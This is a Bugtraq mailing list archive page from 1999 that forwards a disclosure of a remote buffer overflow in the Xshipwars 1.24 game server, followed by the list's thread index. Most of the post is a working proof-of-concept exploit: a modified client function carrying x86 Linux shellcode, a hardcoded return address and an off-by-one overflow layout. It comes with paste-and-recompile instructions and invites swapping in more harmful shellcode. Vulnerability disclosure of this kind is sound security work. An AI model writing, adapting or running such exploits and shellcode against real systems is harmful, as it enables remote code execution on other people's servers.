Bugtraq mailing list archives
xsw 1.24 remote buffer overflow
From: aleph1 () UNDERGROUND ORG (Aleph One)
Date: Thu, 9 Dec 1999 11:05:03 -0800
---------- Forwarded message ---------- Date: Tue, 7 Dec 1999 22:31:02 -0600 To: news () technotronic com From: Amanda Woodward <amandawoodward2 () altavista com> Subject: xsw 1.24 remote buffer overflow Xshipwars remote overflow. Found and written by Amanda Woodward. (amandawoodward2 () altavista com) Latest Server Version Tested: 1.24 (This was the bug they fixed for 1.25) Xshipwars is a server/client combination that allows you to play a little game with good sounds and graphics over tcp/ip on linux or windows or whatever. They give out source to the clients and the server. It's in playable beta and there are public servers on mit.edu and a few other places. See: http://fox.mit.edu/xsw/ If you replace this function in netsend.c with the stuff at the bottom of this file, log into your (or another) server and type "e" and then hit enter in the dialog box, it will crash, possibly running the shellcode, which currently calls /tmp/xx. Shellcode could be created that does something more interesting, but this is just a demo exploit. I'm sure other parts of the protocol have problems as well. This one was interesting because it's a one byte overflow against esp which gives you the eip a bit later. If you go OVER that one byte, you don't get eip. If you go under, then it overwrites with other random things. Trust me. If the offset is off for your box, then the server will still crash, and will begin an endless loop of sending itself log messages, filling up whatever space it can on whatever partition it's installed on. This is less than optimal behavior, so quickly find and kill the server if your exploit fails. Love, A. Woodward, Dec 1999 <cut this and paste it into your client's source file, modify your .h's to raise the limit on a few variables (grep for 256 and turn them into 2560), recompile, and enjoy> /* * Sends a literal command. */ /*hacked to send our attack buffer!*/ int NetSendExec(char *arg) { char larg[CS_MESG_MAX]; char sndbuf[CS_DATA_MAX_LEN]; char exploitbuf[CS_DATA_MAX_LEN]; int i; /*test shellcode. No whitespace, just exec's /tmp/xx. If it's not there, does random things. Replace this for slightly more fun. ;> */ char code[] ="\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c" "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb" "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/tmp/xx"; #define SIZEOFBUF 229 memset(exploitbuf,0x41,SIZEOFBUF); #define SHELLSTART 50 memcpy(exploitbuf+SHELLSTART,code,strlen(code)); /*Return to: 0xbfffebe4 Your Kilometerage May Vary*/ exploitbuf[132]=0xe4; exploitbuf[133]=0xeb; exploitbuf[134]=0xff; exploitbuf[135]=0xbf; exploitbuf[SIZEOFBUF-1]=0; /* if(arg == NULL) return(-1); if(arg[0] == '\0') return(-2); */ /*strncpy(larg, arg, CS_MESG_MAX);*/ strncpy(larg, exploitbuf, CS_MESG_MAX); larg[CS_MESG_MAX - 1] = '\0'; /* * NET_CMD_EXEC format is as follows: * * argument */ sprintf(sndbuf, "%i %s\n", CS_CODE_LITERALCMD, larg ); NetSendData(sndbuf); return(0); } ______________________________________________________________ Open your mind. Close your wallet. Free Internet Access from AltaVista. http://www.altavista.com
Current thread:
- new IE5 remote exploit Jeremy Kothe (Dec 05)
- Re: new IE5 remote exploit Dustin Miller (Dec 06)
- Re: new IE5 remote exploit krisp (Dec 06)
- Analysis of trin00 Dave Dittrich (Dec 07)
- Re: Analysis of trin00 Stefan Aeschbacher (Dec 09)
- Re: Analysis of trin00 Jacob Langseth (Dec 09)
- ISSalert: ISS Security Advisory: Buffer Overflow in Solaris Snoop Aleph One (Dec 09)
- Re: Analysis of trin00 Stefan Aeschbacher (Dec 09)
- xsw 1.24 remote buffer overflow Aleph One (Dec 09)
- Re: new IE5 remote exploit Dustin Miller (Dec 06)
- Analysis of Tribe Flood Network Dave Dittrich (Dec 07)
- Re: Analysis of Tribe Flood Network Mixter (Dec 08)
- Re: Analysis of Tribe Flood Network Stefan Laudat (Dec 10)
- Error in System Policies Adam Simms (Dec 10)
- Re: Analysis of Tribe Flood Network Mixter (Dec 11)
- Big problem on linux 2.0 visi0n (Dec 11)
- Re: Big problem on linux 2.0 visi0n (Dec 11)
- Re: Big problem on linux 2.0 Andrea Arcangeli (Dec 14)
- HP-UX: Security Vulnerability in wu-ftp Aleph One (Dec 13)